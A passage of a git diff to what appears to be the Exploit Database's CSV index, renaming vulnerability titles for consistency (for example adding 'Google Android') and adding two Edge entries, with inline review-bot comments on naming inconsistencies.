diff --git a/files.csv b/files.csv
index 3f3d19e4d..b1cb62ae9 100644
--- a/files.csv
+++ b/files.csv
@@ -170,7 +170,7 @@ id,file,description,date,author,platform,type,port
 978,platforms/windows/dos/978.cpp,"Ashley's Web Server - Denial of Service",2005-05-04,basher13,windows,dos,0
 983,platforms/windows/dos/983.cpp,"DataTrac Activity Console - Denial of Service",2005-05-06,basher13,windows,dos,0
 984,platforms/multiple/dos/984.c,"Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service",2005-05-07,Nicob,multiple,dos,0
-40381,platforms/android/dos/40381.txt,"Android - getpidcon Usage binder Service Replacement Race Condition",2016-09-14,"Google Security Research",android,dos,0
+40381,platforms/android/dos/40381.txt,"Google Android - getpidcon Usage binder Service Replacement Race Condition",2016-09-14,"Google Security Research",android,dos,0
 988,platforms/windows/dos/988.cpp,"Remote File Manager 1.0 - Denial of Service",2005-05-08,basher13,windows,dos,0
 998,platforms/linux/dos/998.c,"Linux Kernel 2.6.12-rc4 - 'ioctl_by_bdev' Local Denial of Service",2005-05-17,alert7,linux,dos,0
 999,platforms/linux/dos/999.c,"Gaim 1.2.1 - URL Handling Remote Stack Overflow",2005-05-17,Ron,linux,dos,0
@@ -312,7 +312,7 @@ id,file,description,date,author,platform,type,port
 1641,platforms/linux/dos/1641.pl,"Libxine 1.14 - MPEG Stream Buffer Overflow (PoC)",2006-04-04,"Federico L. Bossi Bonin",linux,dos,0
 1642,platforms/windows/dos/1642.c,"Ultr@VNC 1.0.1 - VNCLog::ReallyPrint Remote Buffer Overflow (PoC)",2006-04-04,"Luigi Auriemma",windows,dos,0
 1643,platforms/windows/dos/1643.c,"Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow (PoC)",2006-04-04,"Luigi Auriemma",windows,dos,0
-1651,platforms/php/dos/1651.php,"ADODB < 4.70 - (tmssql.php) Denial of Service",2006-04-09,rgod,php,dos,0
+1651,platforms/php/dos/1651.php,"ADODB < 4.70 - 'tmssql.php' Denial of Service",2006-04-09,rgod,php,dos,0
 1657,platforms/linux/dos/1657.asm,"Linux Kernel 2.6.x - 'sys_timer_create()' Local Denial of Service",2006-04-09,fingerout,linux,dos,0
 1667,platforms/multiple/dos/1667.html,"Mozilla Firefox 1.5.0.1 / Camino 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,multiple,dos,0
 1671,platforms/multiple/dos/1671.c,"panic-reloaded - TCP Denial of Service Tool",2006-04-13,hash,multiple,dos,0
@@ -1315,15 +1315,15 @@ id,file,description,date,author,platform,type,port
 10960,platforms/multiple/dos/10960.pl,"Google Chrome 4.0.249.30 - Denial of Service (PoC)",2010-01-03,anonymous,multiple,dos,0
 11009,platforms/multiple/dos/11009.pl,"Novell Netware - CIFS And AFP Remote Memory Consumption Denial of Service",2010-01-05,"Francis Provencher",multiple,dos,0
 11020,platforms/windows/dos/11020.pl,"GOM Audio - Local Crash (PoC)",2010-01-06,applicationlayer,windows,dos,0
-11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Exec (PoC)",2010-01-06,superli,windows,dos,0
+11021,platforms/windows/dos/11021.txt,"FlashGet 3.x - IEHelper Remote Execution (PoC)",2010-01-06,superli,windows,dos,0
 11034,platforms/windows/dos/11034.txt,"Microsoft HTML Help Compiler (hhc.exe) - Buffer Overflow (PoC)",2010-01-06,s4squatch,windows,dos,0
 11043,platforms/hardware/dos/11043.txt,"Total MultiMedia Features - Denial of Service PoC for Sony Ericsson Phones",2010-01-06,Aodrulez,hardware,dos,0
 11044,platforms/linux/dos/11044.txt,"Gnome Panel 2.28.0 - Denial of Service (PoC)",2010-01-06,"Pietro Oliva",linux,dos,0
 11052,platforms/windows/dos/11052.pl,"Kantaris 0.5.6 - Local Denial of Service (PoC)",2010-01-07,anonymous,windows,dos,0
 11053,platforms/windows/dos/11053.py,"ttplayer 5.6Beta3 - Denial of Service (PoC)",2010-01-07,"t-bag YDteam",windows,dos,0
-11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX - Remote Exec (PoC)",2010-01-08,superli,windows,dos,0
-11064,platforms/windows/dos/11064.txt,"UUSee ReliPlayer ActiveX - Remote Exec (PoC)",2010-01-08,superli,windows,dos,0
-11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Exec (PoC)",2010-01-08,superli,windows,dos,0
+11062,platforms/windows/dos/11062.txt,"SopCast SopCore Control ActiveX - Remote Execution (PoC)",2010-01-08,superli,windows,dos,0
+11064,platforms/windows/dos/11064.txt,"UUSee ReliPlayer ActiveX - Remote Execution (PoC)",2010-01-08,superli,windows,dos,0
+11065,platforms/windows/dos/11065.html,"SPlayer XvidDecoder 3.3 - ActiveX Remote Execution (PoC)",2010-01-08,superli,windows,dos,0
 11070,platforms/windows/dos/11070.txt,"Microsoft Windows Live Messenger 2009 - ActiveX Denial of Service",2010-01-08,"HACKATTACK IT SECURITY GmbH",windows,dos,0
 11084,platforms/windows/dos/11084.pl,"Real Player - Local Crash (PoC)",2010-01-10,"D3V!L FUCKER",windows,dos,0
 11095,platforms/windows/dos/11095.txt,"YPOPS! 0.9.7.3 - Buffer Overflow (SEH)",2010-01-10,blake,windows,dos,0
@@ -1340,7 +1340,7 @@ id,file,description,date,author,platform,type,port
 11149,platforms/windows/dos/11149.c,"Sub Station Alpha 4.08 - '.rt' Local Buffer Overflow (PoC)",2010-01-15,"fl0 fl0w",windows,dos,0
 11150,platforms/windows/dos/11150.txt,"Aqua Real 1.0 / 2.0 - Local Crash (PoC)",2010-01-15,R3d-D3V!L,windows,dos,0
 11165,platforms/windows/dos/11165.pl,"MediaMonkey Player - Local Denial of Service",2010-01-17,Red-D3v1L,windows,dos,0
-11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Exec (PoC)",2010-01-17,superli,windows,dos,0
+11176,platforms/windows/dos/11176.txt,"Xunlei XPPlayer 5.9.14.1246 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,dos,0
 11180,platforms/windows/dos/11180.pl,"Muziic Player 2.0 - '.mp3' Local Denial of Service",2010-01-18,Red-D3v1L,windows,dos,0
 11182,platforms/windows/dos/11182.txt,"Microsoft Internet Explorer 6/7/8 - Denial of Service (Shockwave Flash Object)",2010-01-18,"Mert SARICA",windows,dos,0
 11190,platforms/windows/dos/11190.txt,"AOL 9.5 - ActiveX Heap Overflow",2010-01-19,"Hellcode Research",windows,dos,0
@@ -2027,7 +2027,7 @@ id,file,description,date,author,platform,type,port
 17843,platforms/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",windows,dos,0
 17844,platforms/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",windows,dos,0
 17856,platforms/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflow (Denial of Service PoC)",2011-09-18,loneferret,windows,dos,21
-17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0
+17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0
 17879,platforms/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0
 17885,platforms/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",windows,dos,0
 17889,platforms/windows/dos/17889.txt,"Sterling Trader 7.0.2 - Integer Overflow",2011-09-26,"Luigi Auriemma",windows,dos,0
@@ -2992,7 +2992,7 @@ id,file,description,date,author,platform,type,port
 23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0
 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos,0
 23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 - Integer Overflow",2012-12-09,beford,windows,dos,0
-23248,platforms/android/dos/23248.txt,"Android Kernel 2.6 - Local Denial of Service Crash (PoC)",2012-12-09,G13,android,dos,0
+23248,platforms/android/dos/23248.txt,"Google Android Kernel 2.6 - Local Denial of Service Crash (PoC)",2012-12-09,G13,android,dos,0
 23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",windows,dos,0
 23263,platforms/multiple/dos/23263.txt,"Opera 7.11/7.20 HREF - Malformed Server Name Heap Corruption",2003-10-20,@stake,multiple,dos,0
 23267,platforms/windows/dos/23267.txt,"Atrium Software Mercur MailServer 3.3/4.0/4.2 - IMAP AUTH Remote Buffer Overflow",2003-10-20,"Kostya KORTCHINSKY",windows,dos,0
@@ -3966,7 +3966,7 @@ id,file,description,date,author,platform,type,port
 31444,platforms/linux/dos/31444.txt,"MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial of Service",2007-12-05,"Masaaki HIROSE",linux,dos,0
 31478,platforms/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling - Denial of Service",2008-03-24,sipherr,hardware,dos,0
 31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash (PoC)",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80
-31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - (Format String and Denial of Service) Multiple Vulnerabilities",2008-03-26,"Luigi Auriemma",multiple,dos,0
+31542,platforms/multiple/dos/31542.txt,"IBM solidDB 6.0.10 - Format String / Denial of Service",2008-03-26,"Luigi Auriemma",multiple,dos,0
 31984,platforms/linux/dos/31984.txt,"Mozilla Firefox 3.0 - Malformed JPEG File Denial of Service",2008-06-27,"Beenu Arora",linux,dos,0
 31550,platforms/bsd/dos/31550.c,"Multiple BSD Platforms - 'strfmon()' Function Integer Overflow",2008-03-27,"Maksymilian Arciemowicz",bsd,dos,0
 31552,platforms/linux/dos/31552.txt,"Wireshark 0.99.8 - X.509sat Dissector Unspecified Denial of Service",2008-03-28,"Peter Makrai",linux,dos,0
@@ -4320,7 +4320,7 @@ id,file,description,date,author,platform,type,port
 34306,platforms/hardware/dos/34306.txt,"SHARP MX Series - Denial of Service",2014-08-09,pws,hardware,dos,23
 34307,platforms/hardware/dos/34307.txt,"Sky Broadband Router SR101 - Weak WPA-PSK Generation Algorithm",2014-08-09,"Matt O'Connor",hardware,dos,0
 34309,platforms/solaris/dos/34309.txt,"Oracle Solaris - 'rdist' Privilege Escalation",2010-07-13,"Monarch Rich",solaris,dos,0
-34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 - ('modrdn' Request) Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0
+34348,platforms/linux/dos/34348.txt,"OpenLDAP 2.4.22 - 'modrdn' Request Multiple Vulnerabilities",2010-07-19,"Ilkka Mattila",linux,dos,0
 34355,platforms/windows/dos/34355.txt,"Microsoft DirectX 8/9 DirectPlay - Multiple Denial of Service Vulnerabilities",2010-07-18,"Luigi Auriemma",windows,dos,0
 34356,platforms/linux/dos/34356.txt,"gif2png 2.5.2 - Remote Buffer Overflow",2009-12-12,"Razuel Akaharnath",linux,dos,0
 34359,platforms/windows/dos/34359.html,"Microsoft Outlook Web Access for Exchange Server 2003 - Cross-Site Request Forgery",2010-07-20,anonymous,windows,dos,0
@@ -4721,7 +4721,7 @@ id,file,description,date,author,platform,type,port
 38240,platforms/windows/dos/38240.py,"Wireshark 1.12.7 - Division by Zero Crash (PoC)",2015-09-18,spyk,windows,dos,0
 38249,platforms/multiple/dos/38249.txt,"MiniUPnP 1.4 - Multiple Denial of Service Vulnerabilities",2012-01-28,Rapid7,multiple,dos,0
 38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash (PoC)",2015-09-22,VIKRAMADITYA,windows,dos,0
-38262,platforms/osx/dos/38262.txt,"Apple Mac OSX Regex Engine (TRE) - (Integer Signedness and Overflow) Multiple Vulnerabilities",2015-09-22,"Google Security Research",osx,dos,0
+38262,platforms/osx/dos/38262.txt,"Apple Mac OSX Regex Engine (TRE) - Integer Signedness / Overflow",2015-09-22,"Google Security Research",osx,dos,0
 38263,platforms/osx/dos/38263.txt,"Apple Mac OSX Regex Engine (TRE) - Stack Buffer Overflow",2015-09-22,"Google Security Research",osx,dos,0
 38264,platforms/osx/dos/38264.txt,"Apple qlmanage - SceneKit::daeElement::setElementName Heap Overflow",2015-09-22,"Google Security Research",osx,dos,0
 38265,platforms/win_x86/dos/38265.txt,"Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)",2015-09-22,"Nils Sommer",win_x86,dos,0
@@ -5072,15 +5072,15 @@ id,file,description,date,author,platform,type,port
 39648,platforms/windows/dos/39648.txt,"Microsoft Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0
 39649,platforms/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
 39650,platforms/multiple/dos/39650.txt,"Adobe Flash - textfield.maxChars Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
-39651,platforms/android/dos/39651.txt,"Android - ih264d_process_intra_mb Memory Corruption",2016-04-01,"Google Security Research",android,dos,0
+39651,platforms/android/dos/39651.txt,"Google Android - 'ih264d_process_intra_mb' Memory Corruption",2016-04-01,"Google Security Research",android,dos,0
 39652,platforms/multiple/dos/39652.txt,"Adobe Flash - Color.setTransform Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
 39653,platforms/php/dos/39653.txt,"PHP 5.5.33 - Invalid Memory Write",2016-04-01,vah_13,php,dos,0
 39654,platforms/windows/dos/39654.pl,"Xion Audio Player 1.5 (build 160) - '.mp3' Crash (PoC)",2016-04-04,"Charley Celice",windows,dos,0
 39657,platforms/multiple/dos/39657.py,"Hexchat IRC Client 2.11.0 - CAP LS Handling Buffer Overflow",2016-04-04,PizzaHatHacker,multiple,dos,0
 39663,platforms/windows/dos/39663.html,"Microsoft Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
 39669,platforms/linux/dos/39669.txt,"Linux (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
-39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
-39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
+39685,platforms/android/dos/39685.txt,"Google Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
+39686,platforms/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
 39699,platforms/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",windows,dos,0
 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard-Coded Credentials",2016-04-18,DLY,hardware,dos,0
 39712,platforms/win_x86-64/dos/39712.txt,"Microsoft Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)",2016-04-20,"Nils Sommer",win_x86-64,dos,0
@@ -5110,7 +5110,7 @@ id,file,description,date,author,platform,type,port
 39797,platforms/windows/dos/39797.py,"Core FTP Server 32-bit Build 587 - Heap Overflow",2016-05-10,"Paul Purcell",windows,dos,21
 39799,platforms/multiple/dos/39799.txt,"Adobe Reader DC 15.010.20060 - Memory Corruption",2016-05-10,"Pier-Luc Maltais",multiple,dos,0
 39800,platforms/linux/dos/39800.txt,"Nfdump Nfcapd 1.6.14 - Multiple Vulnerabilities",2016-05-10,Security-Assessment.com,linux,dos,0
-39801,platforms/android/dos/39801.c,"Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,android,dos,0
+39801,platforms/android/dos/39801.c,"Google Android Broadcom Wi-Fi Driver - Memory Corruption",2016-05-11,AbdSec,android,dos,0
 39802,platforms/windows/dos/39802.py,"CIScan 1.00 - Hostname/IP Field Overwrite (SEH) (PoC)",2016-05-11,"Nipun Jaswal",windows,dos,0
 39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0
 39819,platforms/windows/dos/39819.txt,"Microsoft Excel 2010 - Crash (PoC) (2)",2016-05-16,HauntIT,windows,dos,0
@@ -5142,7 +5142,7 @@ id,file,description,date,author,platform,type,port
 39906,platforms/multiple/dos/39906.txt,"Microsoft Word (Windows/OSX) - Crash (PoC)",2016-06-09,halsten,multiple,dos,0
 39915,platforms/windows/dos/39915.c,"Armadito Antimalware - Backdoor/Bypass",2016-06-10,Ax.,windows,dos,0
 39920,platforms/osx/dos/39920.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext",2016-06-10,"Google Security Research",osx,dos,0
-39921,platforms/android/dos/39921.txt,"Android - /system/bin/sdcard Stack Buffer Overflow",2016-06-10,"Google Security Research",android,dos,0
+39921,platforms/android/dos/39921.txt,"Google Android - '/system/bin/sdcard' Stack Buffer Overflow",2016-06-10,"Google Security Research",android,dos,0
 39922,platforms/osx/dos/39922.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleMuxControl.kext",2016-06-10,"Google Security Research",osx,dos,0
 39923,platforms/osx/dos/39923.c,"Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl",2016-06-10,"Google Security Research",osx,dos,0
 39924,platforms/osx/dos/39924.c,"Apple Mac OSX Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource",2016-06-10,"Google Security Research",osx,dos,0
@@ -5214,12 +5214,12 @@ id,file,description,date,author,platform,type,port
 40321,platforms/php/dos/40321.php,"PHP 7.0 - 'AppendIterator::append' Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
 40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
 40439,platforms/windows/dos/40439.py,"VideoLAN VLC Media Player 2.2.1 - Buffer Overflow",2016-09-28,"sultan albalawi",windows,dos,0
-40449,platforms/android/dos/40449.txt,"Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",android,dos,0
-40502,platforms/android/dos/40502.txt,"Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos,0
+40449,platforms/android/dos/40449.txt,"Google Android - Insufficient Binder Message Verification Pointer Leak",2016-10-03,"Google Security Research",android,dos,0
+40502,platforms/android/dos/40502.txt,"Google Android - 'gpsOneXtra' Data Files Denial of Service",2016-10-11,"Nightwatch Cybersecurity Research",android,dos,0
 40508,platforms/windows/dos/40508.txt,"Cisco Webex Player T29.10 - '.WRF' Use-After-Free Memory Corruption",2016-10-12,COSIG,windows,dos,0
 40509,platforms/windows/dos/40509.txt,"Cisco Webex Player T29.10 - '.ARF' Out-of-Bounds Memory Corruption",2016-10-12,COSIG,windows,dos,0
 40510,platforms/multiple/dos/40510.txt,"Adobe Flash Player 23.0.0.162 - '.SWF' ConstantPool Critical Memory Corruption",2016-10-12,COSIG,multiple,dos,0
-40515,platforms/android/dos/40515.txt,"Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",android,dos,0
+40515,platforms/android/dos/40515.txt,"Google Android - Binder Generic ASLR Leak",2016-10-12,"Google Security Research",android,dos,0
 40524,platforms/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",2016-10-13,"Antonio Z.",osx,dos,0
 40536,platforms/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",windows,dos,0
 40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash (PoC)",2016-10-18,"Antonio Z.",osx,dos,0
@@ -5293,7 +5293,7 @@ id,file,description,date,author,platform,type,port
 40845,platforms/windows/dos/40845.txt,"Microsoft Internet Explorer 8/9/10/11 - MSHTML 'DOMImplementation' Type Confusion (MS16-009)",2016-11-28,Skylined,windows,dos,0
 40866,platforms/linux/dos/40866.py,"NetCat 0.7.1 - Denial of Service",2016-12-05,n30m1nd,linux,dos,0
 40875,platforms/windows/dos/40875.html,"Microsoft Edge - JSON.parse Info Leak",2016-12-06,"Google Security Research",windows,dos,0
-40876,platforms/android/dos/40876.txt,"Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index",2016-12-06,"Google Security Research",android,dos,0
+40876,platforms/android/dos/40876.txt,"Google Android - IOMXNodeInstance::enableNativeBuffers Unchecked Index",2016-12-06,"Google Security Research",android,dos,0
 40878,platforms/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,windows,dos,0
 40879,platforms/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,windows,dos,0
 40880,platforms/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,windows,dos,0
@@ -5319,8 +5319,10 @@ id,file,description,date,author,platform,type,port
 40933,platforms/windows/dos/40933.svg,"Microsoft Internet Explorer 9 - IEFRAME CMarkup­Pointer::Move­To­Gap Use-After-Free",2016-12-16,Skylined,windows,dos,0
 40935,platforms/windows/dos/40935.html,"Microsoft Internet Explorer 9 - IEFRAME CView::Ensure­Size Use-After-Free (MS13-021)",2016-12-16,Skylined,windows,dos,0
 40944,platforms/multiple/dos/40944.py,"Google Chrome < 31.0.1650.48 - HTTP 1xx base::String­Tokenizer­T<...>::Quick­Get­Next Out-of-Bounds Read",2016-12-19,Skylined,multiple,dos,0
-40945,platforms/android/dos/40945.txt,"Google Android - WifiNative::setHotlist Stack Overflow",2016-12-20,"Google Security Research",android,dos,0
+40945,platforms/android/dos/40945.txt,"Google Android - WifiNative::setHotlist Stack Overflow",2016-12-20,"Google Security Research",android,dos,0
 40946,platforms/windows/dos/40946.html,"Microsoft Internet Explorer 11 MSHTML - CSplice­Tree­Engine::Remove­Splice Use-After-Free (MS14-035)",2016-12-20,Skylined,windows,dos,0
+40947,platforms/windows/dos/40947.html,"Microsoft Edge - SIMD.toLocaleString Uninitialized Memory (MS16-145)",2016-12-21,"Google Security Research",windows,dos,0
+40948,platforms/windows/dos/40948.html,"Microsoft Edge - Internationalization Initialization Type Confusion (MS16-144)",2016-12-21,"Google Security Research",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -5596,7 +5598,7 @@ id,file,description,date,author,platform,type,port
 1402,platforms/sco/local/1402.c,"SCO OpenServer 5.0.7 - (termsh) Privilege Escalation",2006-01-03,prdelka,sco,local,0
 1403,platforms/windows/local/1403.c,"WinRAR 3.30 - Long Filename Buffer Overflow (1)",2006-01-04,K4P0,windows,local,0
 1404,platforms/windows/local/1404.c,"WinRAR 3.30 - Long Filename Buffer Overflow (2)",2006-01-04,c0d3r,windows,local,0
-1406,platforms/windows/local/1406.php,"PHP 4.4.0 - (mysql_connect function) Local Buffer Overflow",2006-01-05,mercenary,windows,local,0
+1406,platforms/windows/local/1406.php,"PHP 4.4.0 - 'mysql_connect function' Local Buffer Overflow",2006-01-05,mercenary,windows,local,0
 1407,platforms/windows/local/1407.c,"Microsoft Windows Server 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)",2006-01-05,SoBeIt,windows,local,0
 1412,platforms/linux/local/1412.rb,"Xmame 0.102 - '-lang' Local Buffer Overflow",2006-01-10,xwings,linux,local,0
 1415,platforms/linux/local/1415.c,"Xmame 0.102 - 'lang' Local Buffer Overflow (C)",2006-01-13,Qnix,linux,local,0
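Review bot: The new title for 1406 puts the word "function" inside the quotes (`'mysql_connect function'`), so the quoted token is no longer just the symbol name. Other rows on this page quote only the identifier, for example `'sys_timer_create()'` and `'ioctl_by_bdev'`. `"PHP 4.4.0 - 'mysql_connect()' Local Buffer Overflow"` would follow that convention and keeps a search for the quoted function name matching this row.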
@@ -6654,7 +6656,7 @@ id,file,description,date,author,platform,type,port
 16086,platforms/linux/local/16086.txt,"OpenVAS Manager - Command Injection",2011-01-31,"Tim Brown",linux,local,0
 16092,platforms/windows/local/16092.py,"CodeBlocks 8.02 - (cbp) Buffer Overflow",2011-02-01,sup3r,windows,local,0
 16098,platforms/android/local/16098.c,"Android 1.x/2.x HTC Wildfire - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0
-16099,platforms/android/local/16099.c,"Android 1.x/2.x - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0
+16099,platforms/android/local/16099.c,"Google Android 1.x/2.x - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0
 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - '.rtx' Buffer Overflow",2011-02-03,sickness,windows,local,0
 16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,kingcope,freebsd,local,0
 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0
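Review bot: The vendor prefix is added to 16099 but not to the adjacent row 16098, which still reads `"Android 1.x/2.x HTC Wildfire - Privilege Escalation"` in this hunk's context lines. If the point of the rename is that a match on `Google Android` in the description column returns every Android entry, that row should be renamed in the same pass, e.g. `"Google Android 1.x/2.x HTC Wildfire - Privilege Escalation"`. Anyone keying inventory or advisory lookups on the title prefix would otherwise miss it.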
@@ -8524,7 +8526,7 @@ id,file,description,date,author,platform,type,port
 39311,platforms/windows/local/39311.txt,"Microsoft Windows - Sandboxed Mount Reparse Point Creation Mitigation Bypass Redux (1) (MS16-008)",2016-01-25,"Google Security Research",windows,local,0
 40360,platforms/linux/local/40360.txt,"MySQL / MariaDB / PerconaDB 5.5.51 / 5.6.32 / 5.7.14 - Code Execution / Privilege Escalation",2016-09-12,"Dawid Golunski",linux,local,3306
 40774,platforms/linux/local/40774.sh,"Nagios 4.2.2 - Privilege Escalation",2016-11-18,"Vincent Malguy",linux,local,0
-39340,platforms/android/local/39340.cpp,"Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0
+39340,platforms/android/local/39340.cpp,"Google Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0
 39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0
 39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0
 39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0
@@ -8820,7 +8822,7 @@ id,file,description,date,author,platform,type,port
 167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow",2004-03-28,"Abhisek Datta",linux,remote,0
 168,platforms/windows/remote/168.c,"RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow",2004-03-28,Sam,windows,remote,0
 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Tool",2004-03-28,blackangels,hardware,remote,0
-171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification payload Integer Overflow",2004-04-05,Rapid7,linux,remote,0
+171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification Payload Integer Overflow",2004-04-05,Rapid7,linux,remote,0
 173,platforms/linux/remote/173.pl,"Monit 4.1 - Buffer Overflow",2004-04-09,gsicht,linux,remote,2812
 174,platforms/linux/remote/174.c,"Monit 4.2 - Buffer Overflow",2004-04-12,"Abhisek Datta",linux,remote,2812
 175,platforms/windows/remote/175.pl,"eMule 0.42d - IRC Remote Buffer Overflow",2004-04-12,kingcope,windows,remote,0
@@ -9013,7 +9015,7 @@ id,file,description,date,author,platform,type,port
 878,platforms/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote,0
 879,platforms/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - Inappropriate GET Request Remote Exploit",2005-03-14,lammat,multiple,remote,0
 883,platforms/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380
-900,platforms/linux/remote/900.c,"Smail 3.2.0.120 - Heap Overflow",2005-03-28,infamous41md,linux,remote,25
